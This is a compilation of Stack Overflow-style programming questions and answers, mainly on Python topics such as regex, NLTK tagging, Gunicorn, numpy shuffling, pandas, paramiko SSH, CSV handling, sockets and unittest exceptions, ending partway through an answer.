Python word in file change Question: I am trying to change the words that are nouns in a text to "noun". I am having trouble. Here is what I have so far. def noun(file): for word in file: for ch in word: if ch[-1:-3] == "ion" or ch[-1:-3] == "ism" or ch[-1:-3] == "ity": word = "noun" if file(word-1) == "the" and (file(word+1)=="of" or file(word+1) == "on" word = "noun" # words that appear after the return outfile Any ideas? Answer: Your slices are empty: >>> 'somethingion'[-1:-3] '' because the endpoint lies before the start. You could just use `[-3:]` here: >>> 'somethingion'[-3:] 'ion' But you'd be better of using [`str.endswith()`](https://docs.python.org/2/library/stdtypes.html#str.endswith) instead: ch.endswith(("ion", "ism", "ity")) The function will return `True` if the string ends with any of the 3 given strings. Not that `ch` is actually a word; if `word` is a string, then `for ch in word` iterates over _individual characters_ , and those are never going to end in 3-character strings, being only one character long themselves. Your attempts to look at the next and previous words are also going to fail; you cannot use a list or file object as a callable, let alone use `file(word - 1)` as a meaningful expression (a string `- 1` fails, as well as `file(...)`). Instead of looping over the 'word', you could use a regular expression here: import re nouns = re.compile(r'(?<=\bthe\b)(\s*\w+(?:ion|ism|ity)\s*)(?=\b(?:of|on)\b)') some_text = nouns.sub(' noun ', some_text) This looks for words ending in your three substrings, but only if preceded by `the` and followed by `of` or `on` and replaces those with `noun`. Demo: >>> import re >>> nouns = re.compile(r'(?<=\bthe\b)(\s*\w+(?:ion|ism|ity)\s*)(?=\b(?:of|on)\b)') >>> nouns.sub(' noun ', 'the scion on the prism of doom') 'the noun on the noun of doom'
Meaning of Stanford Spanish POS Tagger tags Question: I am tagging Spanish text with the Stanford POS Tagger (via NLTK in Python). Here is my code: import nltk from nltk.tag.stanford import POSTagger spanish_postagger = POSTagger('models/spanish.tagger', 'stanford-postagger.jar') spanish_postagger.tag('esta es una oracion de prueba'.split()) The result is: [(u'esta', u'pd000000'), (u'es', u'vsip000'), (u'una', u'di0000'), (u'oracion', u'nc0s000'), (u'de', u'sp000'), (u'prueba', u'nc0s000')] I want to know where can I found what exactly means pd000000, vsip000, di0000, nc0s000, sp000? Answer: This is a simplified version of the tagset used in the **[AnCora treebank](http://clic.ub.edu/corpus/en)**. You can find their tagset documentation here: <http://nlp.lsi.upc.edu/freeling/doc/tagsets/tagset- es.html> The "simplification" consists of nulling out many of the final fields which don't strictly belong in a part-of-speech tag. For example, our part-of-speech tagger will always give you null (`0`) values for the NER field of the original tagset (see [EAGLES noun documentation](http://nlp.lsi.upc.edu/freeling/doc/tagsets/tagset- es.html#nombres)). In short: **the fields in the POS tags produced by our tagger correspond exactly to AnCora POS fields, but a lot of those fields will be null**. For most practical purposes you'll only need to look at the first 2–4 characters of the tag. The first character always indicates the broad POS category, and the second character indicates some kind of subtype. * * * We're in the process of writing some introductory documentation for using Spanish with CoreNLP (that means understanding these tags, and much else) right now. For the moment, you can find more information on the first page of our [technical documentation](https://docs.google.com/document/d/1lI- ie4-GGx2IA6RJNc0PMb3CHDoNQMUa0gj0eQEDYQ0/edit?usp=sharing).
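If you only need the broad category in code, a small lookup on the first character is usually enough. The mapping below is my own summary of the EAGLES/AnCora conventions linked above, so treat it as an assumption and double-check it against the tagset documentation:

    # first letter of an AnCora/EAGLES tag -> coarse part of speech (assumed mapping)
    COARSE_POS = {
        'a': 'adjective', 'c': 'conjunction', 'd': 'determiner',
        'f': 'punctuation', 'i': 'interjection', 'n': 'noun',
        'p': 'pronoun', 'r': 'adverb', 's': 'preposition',
        'v': 'verb', 'w': 'date/time', 'z': 'number',
    }

    tagged = [(u'esta', u'pd000000'), (u'es', u'vsip000'), (u'una', u'di0000'),
              (u'oracion', u'nc0s000'), (u'de', u'sp000'), (u'prueba', u'nc0s000')]
    for token, tag in tagged:
        print token, COARSE_POS.get(tag[0].lower(), 'unknown')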
Django Gunicorn ImportError: No module named django.core.wsgi Question: I have created a Django application but now have plans to use some asynchronous (real-time) functionality in some areas of the site. After doing some research I think I should use `gevent-socketio` and therefore it is required I switch the application server to `Gunicorn`. I have fallen at the first hurdle of deploying `Gunicorn`, I have installed with the command `sudo apt-get install gunicorn` and try to run my application with `gunicorn project.wsgi:application` but it fails and produces the following error: Traceback (most recent call last): File "/usr/lib/python2.7/dist-packages/gunicorn/arbiter.py", line 473, in spawn_worker worker.init_process() File "/usr/lib/python2.7/dist-packages/gunicorn/workers/base.py", line 100, in init_process self.wsgi = self.app.wsgi() File "/usr/lib/python2.7/dist-packages/gunicorn/app/base.py", line 115, in wsgi self.callable = self.load() File "/usr/lib/python2.7/dist-packages/gunicorn/app/wsgiapp.py", line 33, in load return util.import_app(self.app_uri) File "/usr/lib/python2.7/dist-packages/gunicorn/util.py", line 362, in import_app __import__(module) File "/home/alex/django_projects/fantasymatchday_1/fantasymatchday_1/wsgi.py", line 13, in <module> from django.core.wsgi import get_wsgi_application ImportError: No module named django.core.wsgi 2014-11-20 17:31:45 [6605] [INFO] Worker exiting (pid: 6605) 2014-11-20 17:31:45 [6600] [INFO] Shutting down: Master 2014-11-20 17:31:45 [6600] [INFO] Reason: Worker failed to boot. Can anybody give me a clue to what I need to do from here? **I am using python 3.4.0 and Django 1.6** Answer: You have to install `django` and `gunicorn` in the same environment. If you use `virtualenv` make sure you have both in the same virtual environment.
Uniformly shuffle 5 gigabytes of numpy data Question: I'm training a neural network with about five gigabytes of data stored as `numpy` arrays. The data are split into chunks of 100000 rows, and I've done six cycles of training over all the chunks in a random order. Unfortunately, the network has begun to overfit. I think it still has capacity to fit the data more closely; my suspicion is that internal regularities within each chunk are starting to contradict one another, and I need to shuffle the data more thoroughly so that it can train on different combinations. I want to try this before going to the trouble of getting more training data. Does anyone know a good way to generate a new permutation of 3.6 million (very long) rows of numpy data? I thought about using [one of these](http://stackoverflow.com/questions/19304279/how-to-shuffle-a-text-file- on-disk-in-python) techniques, but writing these arrays using `numpy.savetxt` produces _unbelievably_ huge files, and I can't tell how to manipulate individual rows from a standard `npy` file in a way that helps to solve this problem. Right now, my best idea is to create a permutation of paired indices `(c, r)` into the data, where `c` choses a chunk and `r` choses a row from that chunk. I could store each row in a new preallocated array, and then save it. But I wonder if there's a less horribly I/O-bound solution. Is there some principled way to shuffle random pairs of chunks together until you get a permutation that's statistically independent from the starting permutation? Answer: Among the things I've tried so far, a PyTables solution is currently the best, followed by a solution that uses `numpy`'s support for memmapped arrays. The PyTables solution is not straightforward though. If you use a shuffled array of integers to directly index a PyTables array, it's very slow. Much faster is the following two-step process: 1. Select a random subset of the array using a boolean index array. _This must be done in a chunkwise fashion_. If you pass the index array directly to the PyTables array, it's slow. * Preallocate a numpy array and create a list of slices that split the PyTables array into chunks. * Read each chunk _entirely_ into memory, and then use the corresponding chunk of the index array to select the correct values for that chunk. * Store the selected values in the preallocated array. 2. _Then_ shuffle the preallocated array. This process produces a permutation as random as a normal shuffling process would. If that doesn't seem obvious, consider this: `(n choose x) * x! = x! * n! / (x! * (n - x)!) = n! / (n - x)!`. This method is fast enough to do a shuffle-on-load for every training cycle. It's also able to compress the data down to ~650M -- nearly a 90% deflation. Here's my current implementation; this is called once for every training chunk in the corpus. (The returned arrays are shuffled elsewhere.) def _h5_fast_bool_ix(self, h5_array, ix, read_chunksize=100000): '''Iterate over an h5 array chunkwise to select a random subset of the array. `h5_array` should be the array itself; `ix` should be a boolean index array with as many values as `h5_array` has rows; and you can optionally set the number of rows to read per chunk with `read_chunksize` (default is 100000). 
For some reason this is much faster than using `ix` to index the array directly.''' n_chunks = h5_array.shape[0] / read_chunksize slices = [slice(i * read_chunksize, (i + 1) * read_chunksize) for i in range(n_chunks)] a = numpy.empty((ix.sum(), h5_array.shape[1]), dtype=float) a_start = 0 for sl in slices: chunk = h5_array[sl][ix[sl]] a_end = a_start + chunk.shape[0] a[a_start:a_end] = chunk a_start = a_end return a It's somewhat crazy to me that an O(n^2) approach (iterating over the entire PyTables array for every chunk) is faster in this case than an O(n) approach (randomly selecting each row in one pass). But hey, it works. With a bit more indirection, this could be adapted for loading arbitrary non-random permutations, but that adds more complexity than it's worth here. The `mmap` solution is here for reference, for those people who need a pure numpy solution for whatever reason. It shuffles all the data in about 25 minutes, while the above solution manages the same in less than half that time. This should scale linearly too, because `mmap` allows (relatively) efficient random access. import numpy import os import random X = [] Y = [] for filename in os.listdir('input'): X.append(numpy.load(os.path.join('input', filename), mmap_mode='r')) for filename in os.listdir('output'): Y.append(numpy.load(os.path.join('output', filename), mmap_mode='r')) indices = [(chunk, row) for chunk, rows in enumerate(X) for row in range(rows.shape[0])] random.shuffle(indices) newchunks = 50 newchunksize = len(indices) / newchunks for i in range(0, len(indices), newchunksize): print i rows = [X[chunk][row] for chunk, row in indices[i:i + newchunksize]] numpy.save('X_shuffled_' + str(i), numpy.array(rows)) rows = [Y[chunk][row] for chunk, row in indices[i:i + newchunksize]] numpy.save('Y_shuffled_' + str(i), numpy.array(rows))
How to use java libraries in python processing Question: I'm using Processing in Python mode, but I want to use the Processing sound library. I don't know how to import this into my program in Python syntax. In Java it's like this:

    import processing.sound.*;

Thanks Answer: You can use `add_library(processing.sound)`. I used it with the g4p library
python pandas dataframe from file Question: I want to create a dataframe object from a file. The file looks something similar to this Gibberish Header1 Gibberish Header2 Gibberish Header3 Gibberish Header4 (etc)... TAG THING_I_WANT_AS_COLUMN_NAME Column1 1.0 # I'll want this index as data 1 1.2 # I'll want this index as data 2 1.3 etc TAG THING_I_WANT_AS_COLUMN_NAME Column2 1.1 1.1 1.7 I would want the DataFrame to look similar to: Column_1 Column_2 data1 1.0 1.1 data2 1.2 1.1 data3 1.3 1.7 Is there a way to do this without writing a function to turn this into a dictionary that can be write directly into the DataFrame class? I was thinking possibly reshape, but I'm not really sure how that would work in my case. I know writing it to a dict is an easy thing to do, but these files can be quite large, so it might dramatically slow me down and even not be possible with my RAM. Any help, even a point in the right direction would be greatly appreciated. Thanks! Answer: When creating a pandas dataframe from scratch I usually do... import pandas as pd # create array for each column col1 = [float(35*x) for x in xrange(10)] col2 = [float(220*x) for x in xrange(10)] dict = {'col1_name': col1, 'coll2_name': col2} df = pd.DataFrame(dict) Like the other people have said, you'll have to parse the data first. It's hard to say exactly what without seeing the actual data. You could potentially loop over each line in the file, ignore headers, once you hit the line with column name and stuff set a flag. Then you can start appending values to an array. Once you've got both sets of numbers in arrays, build a dictionary like I did up there and you'll have a dataframe!
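A minimal parsing sketch for the layout described in the question; it assumes every data block is introduced by a line starting with `TAG` whose last field is the column name, and that all columns end up the same length. The index labels `data1`, `data2`, ... match the desired output shown above; the input filename is made up.

    import pandas as pd

    def parse_blocks(path):
        columns = {}
        current = None
        with open(path) as f:
            for line in f:
                parts = line.split()
                if not parts:
                    continue
                if parts[0] == 'TAG':
                    current = parts[-1]                    # e.g. 'Column1'
                    columns[current] = []
                elif current is not None:
                    try:
                        columns[current].append(float(parts[0]))
                    except ValueError:
                        pass                               # skip stray non-numeric lines
        return pd.DataFrame(columns)

    df = parse_blocks('datafile.txt')
    df.index = ['data%d' % (i + 1) for i in range(len(df))]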
Python - Mechanize input text in form Question: I'd like to input some text in the text field of a form. This is my current code. What should I do next?

    import re
    from mechanize import Browser
    br = Browser()
    br.open("xyz.com")
    formcount=0
    for frm in br.forms():
      if str(frm.attrs["id"])=="xyz":
        break
      formcount=formcount+1
    br.select_form(nr=formcount)
    ## What should I code here to input text into the form?
    response = br.submit()

Answer:

    br.form['id'] = 'ss-form' # This does the input
    br.submit() # This will submit the form
    print br.response().read() # This will read the new page returned

Try a `print br.response().read()`. If that is what you want, you can parse the response with Beautiful Soup. `soup = BeautifulSoup(br.response().read())`
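If you are not sure what the text control in your form is actually called, a small sketch like the following lists the controls of the selected form and then fills one in by name before submitting; the field name used here is invented and needs to be replaced with whatever the listing shows:

    for control in br.form.controls:
        print control.type, control.name           # find the text field's name

    br.form['some_text_field_name'] = 'the text I want to send'   # hypothetical field name
    response = br.submit()
    print response.read()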
nbconvert markdown not searching predefined images Question: I was wondering why ipython nbconvert --to markdown not searching the image in directory first. If i do this in my tes.ipynb: from Ipython.display import Image Image('tes_files/1.jpg') then if i execute command ipython nbconvert tes.ipynb --to markdown --stdout what i will get the output is from IPython.display import Image Image('tes_files/1.jpg') ![jpeg](tes_files/tes_0_0.jpeg) Why nbconvert not searching for the path specified by the path first, then if it doesn't exist, generate a new one? I know maybe there's some idea that we can import image from all directory and with nbconvert, markdown just gathering it into one folder. Is there another option command? Do i have to create a new profile? ## UPDATE: Suppose I have set the url path for the image folders: > IMG_FOLDERS = '../galleries/tes_files' and set the url path to that directory. At some point, I create a plot. Then when I execute nbconvert, it just create a new folder 'name'_files, same dir as the ipynb, and create a new image based on the plot inside it. How to tell the nbconvert not to create a new directory, but instead, use IMG_FOLDERS? Thanks Answer: The issue here, is that the IPython `Image` class embeds the image data into the notebook if you use it like you did in your example. Embedded images are extracted by a preprocessor from the notebook and finally included in the markdown, latex, etc. document during the conversion. So what you are looking for is a way to link an image to the notebook, which is still possible with the `Image` class. If you check the documentation for the `Image` class (IPython 2.3) you will find: Init definition: Image(self, data=None, url=None, filename=None, format=u'png', embed=None, width=None, height=None, retina=False) ... Parameters ---------- data : unicode, str or bytes The raw image data or a URL or filename to load the data from. This always results in embedded image data. url : unicode A URL to download the data from. If you specify `url=`, the image data will not be embedded unless you also specify `embed=True`. filename : unicode Path to a local file to load the data from. Images from a file are always embedded. Hence, to get the image not embedded but rather linked, you have to use the `url` argument like: Image(url='tes_files/1.jpg') There, is also an `embed` argument but this doesn't seem to work with the filename argument.
Start a process on another computer on the network Question: I'm required to start a series of python scripts and/or other windows executables. Some of these require a Windows system, others require a Linux machine. Currently there are designated machines to run the OS-dependent programs. So I know where I want to start which program. Is there a way to start a python script (or a windows executable) from a python script, on the local network, on another computer (e.g. run `192.168.0.101:/dir/python_script_123.py`)? The script, which should then run various programs, may then look something like this in _pseudo code_:

    linuxip = 192.168.0.101
    linuxparam = "required parameter"
    winip = 192.168.0.201
    winparam = "required parameter"

    #option 1 (run all), 2(run linux only), 3(run windows only), 4(run local only)
    option = 1

    if option == 1:
        magic_things.run("linuxip:/dir/linux_script.py" + linuxparam)
        magic_things.run("winip:C:\\dir\\windows_prog.exe" + winparam)
        subprocess.call(["/dir/local_script.py","parameter"])
        subprocess.call(["/dir/another_local_script.py","parameter"])
    elif option ==2:
        [...]

Answer: You need some way to connect to your client machines. In the case of the Linux machine you could use SSH; see <http://en.wikipedia.org/wiki/Secure_Shell> Assuming you have an SSH server running on the Linux client, you could use the package paramiko (<http://docs.paramiko.org/en/1.15/api/client.html>) to connect to the machine and run your script there. This could look something like this:

    from paramiko.client import SSHClient

    client = SSHClient()
    client.load_system_host_keys()
    client.connect('linuxip', username='your_user', password='very_secret')
    stdin, stdout, stderr = client.exec_command('python /home/your_user/your/path/to/scripty.py')

However, please note that it is not very secure to store passwords in scripts, and you would probably do better with public/private key authentication (see the wiki article). The paramiko package also offers the option of an SSH server, so this might be a solution for your Windows machine, but I am not sure, as I don't run Windows any more. Hope this was helpful! David
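For the key-based authentication mentioned above, the connect call accepts a key file directly; a variant of the snippet above, with the host, user, key path and remote script path all placeholders:

    from paramiko.client import SSHClient

    client = SSHClient()
    client.load_system_host_keys()
    client.connect('linuxip', username='your_user',
                   key_filename='/home/you/.ssh/id_rsa')   # no password in the script
    stdin, stdout, stderr = client.exec_command('python /home/your_user/your/path/to/scripty.py')
    print stdout.read()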
How to debug ImportError "No Module named ..." Question: I am using Django Rest Framework. When I try to go to the swagger docs page, I am getting ImportError: No module named drf_compound_fields from serializers.py where I try to import the following

    from drf_compound_fields.fields import ListField

I have drf-compound-fields 0.2.2 in my virtualenv and I ran the pip list command to make sure that it is installed. Here is what I get from manage.py shell

    Python 2.7.6 (default, Mar 22 2014, 22:59:56)
    [GCC 4.8.2] on linux2
    Type "help", "copyright", "credits" or "license" for more information.
    (InteractiveConsole)
    >>>
    >>>
    >>>
    >>>
    >>> from drf_compound_fields.fields import ListField
    Traceback (most recent call last):
      File "<console>", line 1, in <module>
    ImportError: No module named drf_compound_fields.fields
    >>>

Thanks for your help!! Answer: drf-compound-fields was installed under the same virtualenv where the django server was being run from. Apparently it needs to be installed at the system level and not necessarily at the virtualenv level. The following steps worked for me: 1) Get out of the virtualenv. 2) pip install drf-compound-fields 3) Get back into the virtualenv and start the django process
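When chasing this kind of ImportError it also helps to check which interpreter and search path the failing process is actually using, for example with a quick snippet like this run from the same manage.py shell:

    import sys
    import pprint

    print sys.executable        # which Python binary is running
    pprint.pprint(sys.path)     # where it will look for drf_compound_fields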
How does one create iterateable lists of objects in C++? Question: I'm starting out C++ coming from Python, so I'm pretty much just scrolling through the basics. Problem occurs when I try to make an array with objects in it. In Python I would have a class Car with the attributes `color` and `year`: myCars = [Car("Red", 1986), Car("Black", 2007), Car("Blue", 1993)] # and then going through the cars: for car in myCars: print("The car has the color " + car.color + " and is " + (2014 - car.year) + " years old.") Trying to do something similar in C++: struct Car { string color; int year; }; int cars[3] = {Car cars[0], Car cars[1], Car cars[2]} //EDIT: I wrote bilar but I meant cars. but it is indeed uninteresting to iterate over these cars, as for one, this doesn't work, and secondly, they doesn't have any attributes. I just don't understand, I think maybe I've missed something important and got it all wrong, but then, I reckon I just gotta have this explained clean and nice. Answer: Try this (C++11) - looks almost like Python: std::vector<Car> cars = {{"Red", 1986}, {"Black", 2007}, {"Blue", 1993}}; for (const Car& car : cars) { std::cout << "The car has the color " << car.color << " and is " << (2014 - car.year) << " years old." << std::endl; } C++ constructs involved: * [`std::vector`](http://en.cppreference.com/w/cpp/container/vector) * [list initialization](http://en.cppreference.com/w/cpp/language/list_initialization) * [range `for` loop](http://en.cppreference.com/w/cpp/language/range-for)
How to install aggdraw with Python 2.7 Question: I'd like to use aggdraw with Python 2.7. (Is this a dumb idea anyway? I've seen a nice aggdraw example, but I don't want to regress to Python 2.6. Is there an equivalent drawing library working with Python 2.7?) I have Python 2.7.8 64bit installed on a Windows 7 Enterprise SP 1 64bit. The installer at <http://www.effbot.org/downloads#aggdraw> complains about Python 2.6 missing, and `python setup.py install` complains about a missing `vcvarsall.bat`. So, following all the related posts here, I installed the MS compiler from <http://www.microsoft.com/en-us/download/details.aspx?id=44266>. It's visible in the "Programs and Features" list, and I have a `vcvarsall.bat` in `C:\Users\d031475\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0` now. Still, `python setup.py install` neither runs in CMD directly, nor in the `MS Visual... Compiler for Python 2.7` command prompt which appeared in my Start menu. It still complains about a missing `vcvarsall.bat`. EDIT: Even when I append the relevant directory to my path, so that I can run `vcvarsall.bat` from the command line, `python setup.py install` still complains it can't find it. How strange is that? Answer: To build with "Microsoft Visual C++ Compiler for Python 2.7" you need to use [setuptools >= 6.0](https://pypi.python.org/pypi/setuptools) instead of distutils. Try to change the line `from distutils.core import setup, Extension` in `setup.py` to `from setuptools import setup, Extension`. You'll need to build against the [freetype library](http://www.freetype.org/) to enable text rendering. The aggdraw project appears to be abandoned. The latest [version 1.2a3](http://svn.effbot.org/public/aggdraw/) is from early 2006 and predates Python 2.7, 64 bit, and Pillow. Expect crashes, especially on 64 bit for Windows. Unofficial Windows binaries for aggdraw are available at <http://www.lfd.uci.edu/~gohlke/pythonlibs/#misc>. An alternative to aggdraw is [pycairo](http://cairographics.org/pycairo/) ([Windows binaries](http://www.lfd.uci.edu/~gohlke/pythonlibs/#pycairo)).
Compare two CSV files and print the rows that are different Python Question: I'm trying to compare two csv files that are like below English.csv i am is was were Dictionary.csv i,insomnia d,disease bc,breast cancer I'm trying to compare the first columns in two files and print the rows that are different from Dictionary.csv like below final.csv d,disease bc,breast cancer I tried this code. import csv with open('English.csv', 'rb') as csvfile1: with open ("Dictionary.csv", "rb") as csvfile2: reader1 = csv.reader(csvfile1) reader2 = csv.reader(csvfile2) rows1 = [row for row in reader1] rows2 = [row for row in reader2] col_a = [row1[0] for row1 in rows1] col_b = [row2[0] for row2 in rows2] col_c = [row2[1] for row2 in rows2] only_b = [text for text in col_b if not text in col_a] I can get data from first column that is different, but not from the second column like below. How can I get the corresponding data from second column? >>>only_b ['d','bc'] Answer: Not sure how effective is this but IMO does what you want: import csv with open('English.csv', 'rb') as csvfile1: with open ("Dictionary.csv", "rb") as csvfile2: reader1 = csv.reader(csvfile1) reader2 = csv.reader(csvfile2) rows1_col_a = [row[0] for row in reader1] rows2 = [row for row in reader2] only_b = [] for row in rows2: if row[0] not in rows1_col_a: only_b.append(row) print only_b Outputs: [['d', 'disease'], ['bc', 'breast cancer']]
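A slightly leaner variant of the same idea, using a set for the membership test and writing the result straight to `final.csv` as asked in the question:

    import csv

    with open('English.csv', 'rb') as f1:
        english_words = {row[0] for row in csv.reader(f1) if row}

    with open('Dictionary.csv', 'rb') as f2, open('final.csv', 'wb') as out:
        writer = csv.writer(out)
        for row in csv.reader(f2):
            if row and row[0] not in english_words:
                writer.writerow(row)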
Search a delimited string in a file - Python Question: I have the following read.json file {:{"JOL":"EuXaqHIbfEDyvph%2BMHPdCOJWMDPD%2BGG2xf0u0mP9Vb4YMFr6v5TJzWlSqq6VL0hXy07VDkWHHcq3At0SKVUrRA7shgTvmKVbjhEazRqHpvs%3D-%1E2D%TL/xs23EWsc40fWD.tr","LAPTOP":"error"} and python script : import re shakes = open("read.json", "r") needed = open("needed.txt", "w") for text in shakes: if re.search('JOL":"(.+?).tr', text): print >> needed, text, I want it to find what's between two words (JOL":" and .tr) and then print it. But all it does is printing all the text set in "read.json". Answer: You're calling `re.search`, but you're not doing anything with the returned match, except to check that there is one. Instead, you're just printing out the original `text`. So of course you get the whole line. The solution is simple: just store the result of `re.search` in a variable, so you can use it. For example: for text in shakes: match = re.search('JOL":"(.+?).tr', text) if match: print >> needed, match.group(1) In your example, the match is `JOL":"EuXaqHIbfEDyvph%2BMHPdCOJWMDPD%2BGG2xf0u0mP9Vb4YMFr6v5TJzWlSqq6VL0hXy07VDkWHHcq3At0SKVUrRA7shgTvmKVbjhEazRqHpvs%3D-%1E2D%TL/xs23EWsc40fWD.tr`, and the first (and only) group in it is `EuXaqHIbfEDyvph%2BMHPdCOJWMDPD%2BGG2xf0u0mP9Vb4YMFr6v5TJzWlSqq6VL0hXy07VDkWHHcq3At0SKVUrRA7shgTvmKVbjhEazRqHpvs%3D-%1E2D%TL/xs23EWsc40fWD`, which is (I think) what you're looking for. However, a couple of side notes: First, `.` is a special pattern in a regex, so you're actually matching anything up to _any character_ followed by `tr`, not `.tr`. For that, escape the `.` with a `\`. (And, once you start putting backslashes into a regex, use a raw string literal.) So: `r'JOL":"(.+?)\.tr'`. Second, this is making a lot of assumptions about the data that probably aren't warranted. What you really want here is not "everything between `JOL":"` and `.tr`", it's "the value associated with key `'JOL'` in the JSON object". The only problem is that this isn't quite a JSON object, because of that prefixed `:`. Hopefully you know where you got the data from, and therefore what format it's actually in. For example, if you know it's actually a sequence of colon-prefixed JSON objects, the right way to parse it is: d = json.loads(text[1:]) if 'JOL' in d: print >> needed, d['JOL'] Finally, you don't actually have anything named `needed` in your code; you opened a file named `'needed.txt'`, but you called the file object `love`. If your real code has a similar bug, it's possible that you're overwriting some completely different file over and over, and then looking in `needed.txt` and seeing nothing changed each time…
Python sockets not responsered Question: my code send a http request using sockets and then save the response.It works for me yesterday, but today i cant receive response. I need to use sockets not httplib or urllib. I dont know if code is not working or my python install is crazy. thanks! import socket import logging def get_http(target, port, request): """ Method that sends an HTTP request and returns the response :param target: :type target: :return: :rtype: str """ try: s = socket.create_connection((target, port)) s.sendall(request.encode()) response = repr(s.recv(2024).decode()) except socket.error as e: logging.error('Failed to create connection: %s', e.strerror) return response * * * import lib.netgrab as n class Probe(): def __init__(self): super(Probe, self).__init__() def prueba(self): n.get_http('www.website.com', 80, 'HEAD / HTTP/1.1\r\n\r\n') pr = Probe() re = pr.prueba() print(re) Answer: You have forgot your return statement, please update: def prueba(self): return n.get_http('www.website.com', 80, 'HEAD / HTTP/1.1\r\n\r\n')
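One more thing worth noting: `recv(2024)` only returns the first chunk of the reply, so for anything bigger you usually loop until the server closes the connection. A minimal sketch (the host is a placeholder, and a `Connection: close` header is added so the loop actually terminates):

    import socket

    def get_http_all(target, port, request):
        s = socket.create_connection((target, port))
        s.sendall(request.encode())
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:                      # server closed the connection
                break
            chunks.append(data)
        s.close()
        return b''.join(chunks).decode('utf-8', 'replace')

    print(get_http_all('www.website.com', 80,
                       'HEAD / HTTP/1.1\r\nHost: www.website.com\r\nConnection: close\r\n\r\n'))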
Python Guessing Game Correct answer being printed even when player gets answer right Question: So I have recently started programming python and I have one issue with this code. When the player gets the answer incorrect after using all their lives it should print the answer which it does but only the first time the layer plays i they play again they don't get told the correct answer if the get it wrong. It also does this when the player gets the answer correct. Plus the number the computer chooses stays the same when you use the play again function. Please try and help me but bear in mind my understanding cane be very limited in some aspects of python. I've included lots of comments to help others understand whats going on. I have included my code and what I get in the shell. Code: #imports required modules import random from time import sleep #correct number variable created num = 0 #generates number at random comp_num = random.randint(1,10) print('I\'m thinking of a number guess what it is...\n') #main game code def main(): #lives created lives = 3 #correct number variable reset num = 0 while lives >= 1: #player guesses guess = int(input('Guess: ')) if comp_num == guess: #if correct says well done input('\nWell Done! You guessed Correctly!\n') #player doesn't get told what the number is if there right num = num +1 break elif comp_num >= guess: #if guess is too low tells player #one live taken for incorrect guess lives = lives -1 print('\nToo low!\n') #player is told how many lives they have left print('You guessed incorrectly. You have',lives,'live(s) remaining.\n') elif comp_num <= guess: #if guess is too high tells player #one live taken for incorrect guess lives = lives -1 print('\nToo high!\n') #player is told how many lives they have left print('You guessed incorrectly. You have',lives,'live(s) remaining.\n') def end(): #asks player if they want to play again play_again = input('Would you like to play again?[Y/N] ') while play_again.lower() == 'y': #if they do game resets and plays again if play_again.lower() == 'y': comp_num = random.randint(1,10) print('\nI\'m thinking of a number guess what it is...\n') main() play_again = input('Would you like to play again?[Y/N] ') if play_again.lower() == 'n': break if play_again.lower() == 'n': #if they don't game ends input('\nOk, Press enter to exit') exit() main() if num != 1: #if player guesses incorrectly they get told the correct awnser print('The number I was thinking of was...',comp_num,'!\n') end() SHELL: I'm thinking of a number guess what it is... Guess: 5 Well Done! You guessed Correctly! The number I was thinking of was... 5 ! Would you like to play again?[Y/N] y I'm thinking of a number guess what it is... Guess: 5 Well Done! You guessed Correctly! Would you like to play again?[Y/N] y I'm thinking of a number guess what it is... Guess: 5 Well Done! You guessed Correctly! Would you like to play again?[Y/N] y I'm thinking of a number guess what it is... Guess: 5 Well Done! You guessed Correctly! Answer: The problem with your function is that you have a global variable named `num`, but your `main` function also has a local variable named `num`. The `num += 1` line inside `main` only changes the local variable. But the `if num != 1` at the end checks the global variable. To fix this, add a global statement: def main(): global num # the rest of your code * * * Why does this work? 
In Python, any time you write an assignment statement (like `num = 0` or `num += 1`) in a function, that creates a local variable—unless you've explicitly told it not to, with a `global` statement.* So, adding that `global num` means that now, there is no local variable `num`, so `num += 1` affects the global instead. This is explained in more detail in the tutorial section on [Defining Functions](https://docs.python.org/3/tutorial/controlflow.html#defining- functions). * Or a `nonlocal` statement, but you don't want to learn about that yet. * * * However, there's a better way to fix this. Instead of using a global variable, you can `return` the value in the local variable. Like this: def main(): # your existing code return num # your other functions score = main() if score != 1: #if player guesses incorrectly they get told the correct awnser print('The number I was thinking of was...',comp_num,'!\n')
Exception raising does not reflect in test case even though raised as seen in logs Question: I'm practicing TDD in Python and came across a problem in testing whether an exception is raised. Here is my `test_phonebook.py` with `test_add_empty_name_raises_exception` which fails. import unittest import phonebook class Test(unittest.TestCase): def test_add_empty_name_raises_exception(self): self.assertRaises(ValueError, phonebook.add, "", "1111111111") if __name__ == "__main__": # import sys;sys.argv = ['', 'Test.testName'] unittest.main() Below is my `phonebook.py` with the method `add` which adds the data into the dictionary. import re _phonebook = {} file_name = "phonebook.txt" def is_valid_name(name): return re.search(r"([A-Z][a-z]*)([\\s\\\'-][A-Z][a-z]*)*", name) is not None def is_valid_number(number): return re.search(r"\+?[\d ]+$", number) is not None def add(name, number): try: if is_valid_name(name) and is_valid_number(number): _phonebook[name] = number else: raise ValueError("Invalid arguments.", name, number) except ValueError as err: print err.args if __name__ == '__main__': pass My problem is that the test fails even though it is seen in the console log that there was a `ValueError` raised within the `add` method. Finding files... done. Importing test modules ... done. ('Invalid arguments.', '', '1111111111') ====================================================================== FAIL: test_add_empty_name_raises_exception (path.to.phonebook.test_phonebook.Test) ---------------------------------------------------------------------- Traceback (most recent call last): File "path\to\phonebook\test_phonebook.py", line 13, in test_add_empty_name_raises_exception self.assertRaises(ValueError, phonebook.add, "", "1111111111") AssertionError: ValueError not raised ---------------------------------------------------------------------- Ran 1 test in 0.002s How do I solve this? I there something I forgot? I also tried using the new format for handling exceptions in tests in Python 2.7 but it still hasn't caught the `ValueError` raising. def test_add_empty_name_raises_exception(self): with self.assertRaises(ValueError): self.phonebook.add("", "1111111111) I also changed the form of the test case into using lambdas but still no changes. def test_add_empty_name_raises_exception(self): self.assertRaises(ValueError, lambda: phonebook.add("", "1111111111")) I also cleaned my directory and restarted Eclipse Luna and problem still persists. **Possible solution** I was reading the [8.Errors and Exceptions](https://docs.python.org/2/tutorial/errors.html) documentation and got to the "[Raising Exceptions](https://docs.python.org/2/tutorial/errors.html#raising- exceptions)" part which states that: If you need to determine whether an exception was raised but don’t intend to handle it, a simpler form of the raise statement allows you to re-raise the exception: I added this to the existing `add` method as such: def add(name, number): try: if is_valid_name(name) and is_valid_number(number): _phonebook[name] = number print "Added %s:\t%s" % (name, number) else: raise ValueError("Invalid arguments.", name, number) except ValueError as err: print err.args raise Which caused the test case to pass. Is this the correct way? To call `raise` again in the `except` block? Answer: When you catch an exception (in your `except ValueError as err:` block), you prevent it from continuing back up the call stack to eventually terminate the program. 
